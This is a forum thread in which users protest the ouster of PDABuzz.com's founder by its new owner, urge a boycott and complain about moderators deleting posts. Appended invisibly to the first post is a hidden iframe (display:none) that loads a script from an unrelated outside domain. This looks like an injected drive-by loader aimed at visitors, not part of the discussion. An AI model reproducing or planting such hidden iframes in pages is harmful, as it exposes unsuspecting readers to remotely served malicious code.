+ Reply to Thread

The Death of PDABuzz.com

As I'm sure most people here know, Wes, the hardworking and dedicated founder of PDABuzz.com, a very useful site and discussion board, has been ousted by Handheld Media Group, the company that bought the site from CompanionLink. Many of us who frequented the boards there are quite upset at this and have been jumping ship, myself included. We've all left to find new homes, and this one I've picked to become one of mine (well, I have posted here before, but now I'll probably spend a lot more time here)... I just felt that something needs to be said about this situation in as many different PDA-related forums as possible to spread the word about what an unfair, un-people-centric thing HMG has done (they told Wes he could either leave or keep the site by working for 6 months unpaid) I am not saying that HMG was not within their legal rights to do this, rather I am saying that it was an unjust, heartless, and utterly unneccessary (the new staff has so far done next to nothing but delete various protesting posts) move. Personally I plan to boycott all HMG products such as Handheld Computing Magazine, its website hcmag.com, and of course, the now-dead-to-me PDABuzz.com and would like to see others do the same. Please, feel free to post your thoughts on the situation here.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Oh When that Shark Bites! LBOCEAN's Avatar
    Just a suggestion; but if you feel any of that information is still valuable, you might want to get everyone (intrested) together and attempt to aquire the boards threads, or the entire thing, if its possible, and simply find someone who is willing to maintain it from there on.

how would we go about doing something like that? I doubt HMG would give us the boards, so we'd have to get all the threads somehow, but that's a ton of threads....

Submit a request and make note that there are x-amount of users that depend upon the existing information a valued resource.

They might be nice enough to parse it out for you.

Re: The Death of...

[quote:3fa06beaf8="MikeM"]...I am saying that it was an unjust, heartless, and utterly unneccessary (the new staff has so far done next to nothing but delete various protesting posts) move. ...[/quote:3fa06beaf8]

has anyone else noticed that threads are being deleted here at smartphonesource, even though they are properly placed &amp; on-topic, just because (imho) a moderator feels his toes are being stepped on?

i guess this one will probably be deleted now too.

i am beginning to feel very unwelcome here.

it seems as if someone desires to make things better and help move forward, they are "censored" for it.

imho, what makes a forum is free and open discussion. funny, but that is the dictionaries definition too.
    [i:3fa06beaf8]forum
    n 1: a public meeting or assembly for open discussion[/i:3fa06beaf8]

maybe i'm wrong.
    iBug
    mac osx usernew beetle pilotpowerbook operatorsmartphone communicator

No, I doubt the deletions, especially when there's been posting troubles and no doubt, data corruption in some of the threads.

If MM or others are performing any type of reindexing, it is possible to loose some things.

There pretty open about leaving stuff around. Heck, remember that one discussion that went on and on and on and OH, sorry.

Anyways, they just sat back until the originator of the thread requested it to be locked.

I would'nt worry to much, things are pretty reseliant around here.

Damn, If it were'nt for them cleaning up a few things I posted I would have never see this General Discussion area.

Yep, when I head in to the forum, I go right to 6035 and don't pay no attention to much else. But, I see i'll have to check in on things once in awhile so I don't mess up on a posting or something.

Even my post about putting together a local SIG group is still hanging around. Talk about your dumpy post

I've gotten, what, two responses.

it's true...

[quote:66968572d7="lbocean"]No, I doubt the deletions, especially when there's been posting troubles and no doubt, data corruption in some of the threads.

If MM or others are performing any type of reindexing, it is possible to loose some things.

There pretty open about leaving stuff around. Heck, remember that one discussion that went on and on and on and OH, sorry.

Anyways, they just sat back until the originator of the thread requested it to be locked.

I would'nt worry to much, things are pretty reseliant around here.

Damn, If it were'nt for them cleaning up a few things I posted I would have never see this General Discussion area.

Yep, when I head in to the forum, I go right to 6035 and don't pay no attention to much else. But, I see i'll have to check in on things once in awhile so I don't mess up on a posting or something.

Even my post about putting together a local SIG group is still hanging around. Talk about your dumpy post

I've gotten, what, two responses.[/quote:66968572d7]

i know what you are saying about somethings hanging around forever, but i have received pm from a moderator confirming post deletion.
    the funny/sad thing is that the post subject was the technical problems we are having and cleaning up the forums.

i guess the moderator felt it was some sort of attack on his moderating skills...
    it wasn't, but deleted just the same.

iBug

Oh, if that's all, that would be ok.

Kind of like removing a technical support issue once it's been resolved.

Makes it easier for them to see if new issues are occuring vs. the old stuff.

No Biggie.

Just as long as they don't wipe out really good helpful information.

Like everything I add

clarification...

yeah, but these issues are CURRENT.

aren't the dup posts and misnumbered threads still active

it's like the moderator is trying to dispose of threads if they call attention to it.

anyway, guess it's in my head.

iBug

Your a Bug, what else!